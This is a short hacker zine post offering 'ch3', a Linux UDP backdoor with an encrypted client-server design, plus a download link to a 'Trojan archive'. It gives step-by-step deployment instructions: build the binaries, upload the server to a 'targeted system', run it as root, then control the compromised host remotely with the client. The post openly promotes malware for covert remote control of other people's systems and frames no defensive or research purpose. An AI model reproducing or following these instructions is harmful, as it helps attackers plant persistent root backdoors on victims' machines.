UDP Backdoor with source by CHAMPION Hi. Here is my third backdoor written specially for black.box 'zine. It's named 'ch3' and runs on most linux distributions, I didn't have enough time to test it on other platforms. The backdoor has a server and client part(edit ch3.h to change server and client port numbers, default password and etc.) This is a udp backdoor and it encrypts every packet with blowfish encryption, also every packet is coded with passphraze. In this package I have included mkpass.c for encoding your passphrazes. - To install the backdoor unpack the package on your box: $ tar xvfz ch3.tar.gz and after that make changes to ch3.h (if u dont want to use defaults) simply type 'make', and you will get 3 binaries ch3cli, ch3serv and mkpass. Upload ch3serv to the targeted system box, and run it with root (0) uid. Now you are ready: use ch3cli to control your system, just type ./ch3cli the_IP_of_the_system's_host Type 'id' to see who you are. Don't forget to use ONLY IPs NOT hostnames! ============================================= Download the backdoor here: Trojan archive > Linux ch3.tar.gz